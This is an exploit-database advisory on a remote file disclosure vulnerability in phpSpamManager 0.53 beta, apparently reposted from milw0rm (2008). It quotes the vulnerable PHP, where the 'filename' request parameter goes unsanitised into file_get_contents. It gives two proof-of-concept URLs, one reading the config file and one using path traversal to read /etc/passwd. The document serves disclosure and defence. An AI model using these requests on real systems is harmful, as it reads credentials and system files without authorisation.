phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability

vendor:

phpSpamManager

by:

Mahmood_ali

7.5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: phpSpamManager

Affected Version From: 0.53 beta

Affected Version To: 0.53 beta

Patch Exists: NO

Related CWE: N/A

CPE: a:phpspammanager:phpspammanager:0.53.beta

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'filename' parameter to '/body.php'. This can be exploited to disclose the contents of arbitrary files on the affected system by passing a path to the file in the 'filename' parameter.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability
D.Script : http://sourceforge.net/project/showfiles.php?group_id=141000
Vuln Code 
Ln 38 -> 47 : 
//get filename
     $okprint=false;
     $filename = $_REQUEST['filename']; <--- XxX
     if ($filename!='FILENAME')
     {
      debug_print("analysing " .$filename);
      //replace # by dots if necessary
      $filename = preg_replace("/#/",".",$filename);
$mailtext=file_get_contents($filename); <--- XxX
	 $email=new parseMail($mailtext); <--- XxX
POC :
/phpspammanager.0.53.dev/body.php?filename=include/config.inc.php
/phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd
                     I'm Mahmood_ali --- I'm Tryagi

# milw0rm.com [2008-03-31]